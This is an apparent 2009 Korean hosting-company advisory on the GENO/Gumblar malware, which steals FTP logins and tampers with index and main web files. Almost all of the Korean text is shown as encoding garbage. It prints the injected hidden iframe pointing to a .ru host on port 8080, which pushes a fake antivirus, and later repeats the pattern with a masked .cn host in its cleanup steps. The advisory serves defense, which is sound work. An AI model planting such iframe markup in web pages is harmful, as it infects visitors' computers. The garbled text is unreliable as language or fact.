Á¦¸ñ |
GENO ¾Ç¼ºÄÚµå ftp°èÁ¤µµ¿ëÅëÇÑ index, main º¯Á¶ |
|
ÀÛ¼ºÀÏ |
2009-08-28 14:28:00 |
|
|
Á¦¸ñ : GENO ¾Ç¼ºÄÚµå ftp°èÁ¤µµ¿ëÅëÇÑ index, main º¯Á¶
³»¿ë : ÃÖ±Ù °Ëºí·¯(Gumblar) ȤÀº GENO ¶ó°í ºÒ¸®´Â ¾Ç¼ºÄڵ尡 ±Þ¼ÓÈ÷ ÀüÆĵǰí ÀÖ½À´Ï´Ù. ÇØ´ç ¾Ç¼ºÄÚµå´Â ¾îµµºñ(Adobe)»çÀÇ ¾ÆÅ©·Î¹îÀ̳ª Ç÷¡½¬ÀÇ º¸¾È ÆÐÄ¡°¡ µÇÁö ¾ÊÀº PC°¡ ƯÁ¤ À¥ »çÀÌÆ®¸¦ ¿±â¸¸ Çصµ °¨¿°µÇ´Â 'µå¶óÀÌºê ¹ÙÀÌ ´Ù¿î·Îµå' ¹æ½ÄÀ¸·Î ÀüÆĵǰí ÀÖ¾î °¨¿°¼Óµµ°¡ ¸Å¿ì ºü¸¨´Ï´Ù. ¶ÇÇÑ °¨¿°µÈ PC ÀÌ¿ëÀÚ°¡ À¥»çÀÌÆ®ÀÇ ÆÄÀÏÀ» °ü¸®ÇÏ´Â FTP ÇÁ·Î±×·¥À» °¡Áö°í ÀÖÀ» °æ¿ì ID¿Í ºñ¹Ð¹øÈ£¸¦ »©³» ÇØ´ç À¥»çÀÌÆ®ÀÇ index , main µîÀÇ À̸§À» °¡Áø html, php ÆÄÀϵéÀ» º¯Á¶Çؼ¾Ç¼ºÄڵ带 ´Ù¿î¹Þ´Â Äڵ带 ½É¾î³õ°Ô µË´Ï´Ù.
Áõ»ó : º» Çö»óÀº »çÀÌÆ®°¡ ÃʱâȸéÀÌ ´À·ÁÁö°Å³ª, ȸéÀÌ Æ²¾îÁö°Å³ª, °ü¸®ÀÚ¸ðµå Á¢±Ù½Ã ¿¡·¯¸Þ½ÃÁö Ãâ·Â µî À» º¸½Ç ¼ö ÀÖ½À´Ï´Ù.
½ÇÁ¦ index.phpÆÄÀÏÀÇ ÁÖ¿ä ºÎºÐÀÔ´Ï´Ù.
<body><iframe src="http://3e0.ru:8080/index.php" width=129 height=172 style="visibility: hidden"></iframe> <p> ÆäÀÌÁö¸¦ º¸·Á¸é, ÇÁ·¹ÀÓÀ» º¼ ¼ö ÀÖ´Â ºê¶ó¿ìÀú°¡ ÇÊ¿äÇÕ´Ï´Ù. </p> </bo
»óÀ§¿Í °°ÀÌ index.php ³»¿ëÀÌ º¯°æµË´Ï´Ù. ¸Ç ¾Æ·¡ </body>űװ¡ Á¤»óÀûÀ¸·Î ÀúÀåµÇÁö ¾Ê°í, 3e0.ru »çÀÌÆ®·Î Á¢¼Ó½Ã¿¡´Â activeX°¡ »ç¿ëÀÚ°¡ ¸ð¸£°Ô ¼³Ä¡µÇ°í 10ÃÊ µÚ¿¡ ÀÚµ¿À¸·Î ¸®ºÎÆÃÀ» ½Ãŵ´Ï´Ù. activex·Î ¼³Ä¡µÈ ÆÄÀÏÀº ¿äÁò ¶ß°í ÀÖ´Â °¡Â¥ ¹é½Å Home Antivirus 2010 °¡ ÀÚµ¿À¸·Î ¼³Ä¡µÇµµ·Ï ÇÏ´Â °ÍÀÔ´Ï´Ù. PC »ç¿ëÀÚ°¡ ¾Ç¼ºÄÚµå ÆÄÀÏÀ» »èÁ¦ÇÑ µÚ¿¡µµ PC¸¦ ²°´Ù°¡ ÄÓ ¶§ ¾Ç¼ºÄڵ尡 À缳ġ¸¦ ½ÃµµÇÏ´Â °¡Â¥¹é½Å ¡®Home Antivirus 2010Àº ¸¶ÀÌÅ©·Î½ºÇÁÆ® ¿î¿µÃ¼Á¦(OS) À©µµÀÇ Á¤»ó ½Ã½ºÅÛ ÆÄÀÏÀÎ ntfs.sys ÆÄÀÏÀ» º¯Á¶ÇØ ¾Ç¼ºÄÚµå À缳ġ¸¦ ½ÇÇàÇÕ´Ï´Ù. °¡Â¥¹é½Å¿¡ °¨¿°µÈ °æ¿ì¿¡´Â PC ¸ð´ÏÅÍÀÇ ¿À¸¥ÂÊ ¾Æ·¡ ºÎºÐ¿¡ ¡®´ç½ÅÀÇ ÄÄÇ»ÅÍ°¡ ¾Ç¼ºÄڵ忡 °¨¿°µÆ´Ù(Your Computer is infected!)¡¯´Â ÇãÀ§ °æ°íâÀÌ ¶å´Ï´Ù. ÇÏÁö¸¸ ÀÌ °æ°íâÀº °¡Â¥ÀÔ´Ï´Ù. »ç¿ëÀÚÀÇ PC ³»¿¡ ¾²·¹±â ÆÄÀϵéÀ» ¸¶±¸ÀâÀÌ·Î »ý¼º½ÃŲ ÈÄ ±×°ÍµéÀ» ã¾Æ Áø´Ü¡¤Ä¡·áÇÏ´Â °úÁ¤¿¡¼ ´ë±Ý°áÁ¦¸¦ ¿ä±¸ÇÏ´Â ¼ö¹ýÀÔ´Ï´Ù. °æ°íâÀÇ ¸»¸¸ ¹Ï°í Ä¡·á¸¦ À§ÇØ ¡®Remove¡¯¸¦ Ŭ¸¯Çϰųª ÇãÀ§ °æ°í Æ˾÷âÀ» Ŭ¸¯ÇÏ¸é °áÁ¦ ÆäÀÌÁö·Î ¿¬°áµË´Ï´Ù. ½ÇÁúÀûÀ¸·Î Your Computer is infected!°¡ ¹«½¼ ÇÁ·Î¼¼½ºÀÎÁö windows ÀÛ¾÷°ü¸®ÀÚ¸¦ ¶ç¿öµµ À̸§ÀÌ ³ªÅ¸³ªÁö ¾Êµµ·Ï µÇ¾îÀÖ¾î¼ ÀÏ¹Ý À¯ÀúµéÀº È®ÀÎÀ» Á¦´ë·Î ÇÒ ¼ö ¾ø°Ô µË´Ï´Ù.
ÇØ°á ¹æ¹ý : 1) ÇØ´ç pc ¿¡¼ ¾Ç¼ºÄڵ带 Á¦°ÅÇØ¾ß ÇÕ´Ï´Ù. Á¦°Å°¡ ¾î·Á¿ï °æ¿ì OS ¸¦ À缳ġÇØ¾ß ÇÕ´Ï´Ù. ¾Ç¼ºÄڵ尡 Á¦°ÅµÇÁö ¾ÊÀº »óÅ¿¡¼ ´Ü¼øÈ÷ ºñ¹Ð¹øÈ£¸¦ ¹Ù²Ûä ftp Á¢¼ÓÀ» ÇÏ°Ô µÇ¸é Áö¼ÓÀûÀ¸·Î ID ¿Í ºñ¹Ð¹øÈ£°¡ À¯ÃâµÇ¾î¼ »çÀÌÆ® º¯Á¶°¡ Áö¼ÓµË´Ï´Ù. ºÎµæÀÌ ÇÏ°Ô ¾Ç¼ºÄÚµå Á¦°ÅµÇ±â Àü¿¡ ±ÞÇÏ°Ô ¼öÁ¤À» ÇϽǷÁ°í ÇÑ´Ù¸é ºñ¹Ð¹øÈ£¸¦ ¹Ù²Ù½Ã°í ftp »ç¿ëÀ» ¸·°í, ´ë½Å sftp ¸¦ »ç¿ëÇØ¾ß ÇÕ´Ï´Ù. sftp ´Â ÇâÈÄ µ¿ÀÏ ¹®Á¦ ¿¹¹æÀ» À§Çؼ¶óµµ ftp ´ë½Å °è¼Ó »ç¿ëÀ» ÇϽǰÍÀ» ±ÇÀåÇص帳´Ï´Ù.
2) Microsoft¿¡¼ Á¦°øÇÏ´Â ÃֽŠº¸¾È ÆÐÄ¡¸¦ Àû¿ëÇÏ¿© ÀÎÅÍ³Ý ÀͽºÇ÷η¯¿¡ Á¸ÀçÇÏ´Â Ãë¾àÁ¡ Á¦°Å¸¦ ÇÕ´Ï´Ù.
3) ¾îµµºñ ÃֽŠ¹öÀü ¾÷µ¥ÀÌÆ® : ¾îµµºñ ¸®´õ ½ÇÇà ÈÄ »ó´Ü ¸Þ´º¿¡¼ [µµ¿ò¸»] – [¾÷µ¥ÀÌÆ® È®ÀÎ]À» ÅëÇØ ÃֽŠ¹öÀüÀÎÁö È®ÀÎ ÈÄ ÇÊ¿ä ½Ã ¾÷µ¥ÀÌÆ® ÇÕ´Ï´Ù. ¾îµµºñ ¾÷µ¥ÀÌÆ® »çÀÌÆ® : http://www.adobe.com/kr/downloads/updates/
4) ¾îµµºñ Ç÷¡½¬ Ç÷¹À̾î(Adobe Flash Player)¸¦ ÃֽŠ¹öÀüÀ¸·Î ¾÷µ¥ÀÌÆ® : À©µµ¿ì ½Ã½ºÅÛ (º¸Åë C:\Windows\System32) Macromed ÀÇ Flash Æú´õ·Î À̵¿ÇÏ¿©FlashUtil9?.exe (e,f µî ¾ËÆĺª) ½ÇÇàÇÕ´Ï´Ù.
5) ¹é½Å »ç¿ë ¹× ÃֽŠ¿£Áø ¾÷µ¥ÀÌÆ® (½Ç½Ã°£ °¨½Ã ±â´É »ç¿ë) : V3(V3 IS, V3 365, V3 Lite ¹× V3 Net for Server Á¦Ç°±º)¿¡¼´Â 2009.05.21.00 ¿£Áø¿¡¼ºÎÅÍ Áø´Ü ¹× Ä¡·á °¡´ÉÇÕ´Ï´Ù.
6) »çÀÌÆ®°¡µå(SiteGuard) ¼³Ä¡ ¹× Àû¿ë : À§Çè À¥»çÀÌÆ® »çÀü Â÷´Ü ÇÁ·Î±×·¥ÀÎ »çÀÌÆ®°¡µå ¼³Ä¡·Î ¾ÇÀÇÀûÀÎ À¥ »çÀÌÆ®¿¡ ´ëÇÑ °Ë»ç ¹× Â÷´ÜÇÕ´Ï´Ù.
7) ¼¹ö³» º¯Á¶µÈ html, php ÆÄÀÏ¿¡¼ ´ÙÀ½°ú °°Àº ÇüÅÂÀÇ Äڵ带 Á¦°ÅÇϽñ⠹ٶø´Ï´Ù. < iframe src = " http://xxxxxxxxxxx.cn:8080/index.php" width=198 height=141 >
|
|
|
|
|
|
|